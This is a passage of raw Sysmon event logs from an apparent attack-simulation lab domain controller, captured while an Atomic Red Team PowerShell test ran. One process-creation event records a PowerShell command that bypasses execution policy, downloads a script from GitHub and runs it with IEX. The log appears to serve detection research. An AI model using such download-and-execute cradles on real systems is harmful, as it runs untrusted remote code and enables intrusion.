C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.723{05ADC7E1-7072-603D-5A88-00000000AD01}8448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.426{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=307EBCDAF809937FC8F19CF6761464AC,SHA256=A332349F55FFF232FD0117FB9DDC7B5867C9FDA1B161FB504AB77D732ACCE45E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.373{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.373{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.333{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.333{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.317{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A5B107919DB0473696A671D9E1DACB7,SHA256=8950D97AD3B059B09BA51BF2F55B1A2030181CA63383D8BDCEE4BA10208479F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.317{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A61F18F3F18613BE24B1125F9450B49,SHA256=657605D6A2CD1CEC35B15CA99F66FCFE9C5812FFA5AF05CAF9FD248DA84184E2,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001695780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:38.301{05ADC7E1-7072-603D-5A88-00000000AD01}8448\PSHost.132591128182256974.8448.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.301{05ADC7E1-7072-603D-5A88-00000000AD01}8448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mdk41zn3.1ym.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.286{05ADC7E1-7072-603D-5A88-00000000AD01}8448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_byxcywjn.k00.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.273{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_byxcywjn.k00.ps12021-03-01 22:53:38.273 10341000x80000000000000001695776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.254{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.223{05ADC7E1-7072-603D-5988-00000000AD01}48448576C:\Windows\system32\cmd.exe{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.225{05ADC7E1-7072-603D-5A88-00000000AD01}8448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7072-603D-5988-00000000AD01}4844C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"" 10341000x80000000000000001695767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7072-603D-5988-00000000AD01}4844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7072-603D-5988-00000000AD01}4844C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7072-603D-5988-00000000AD01}4844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.207{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7072-603D-5988-00000000AD01}4844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fb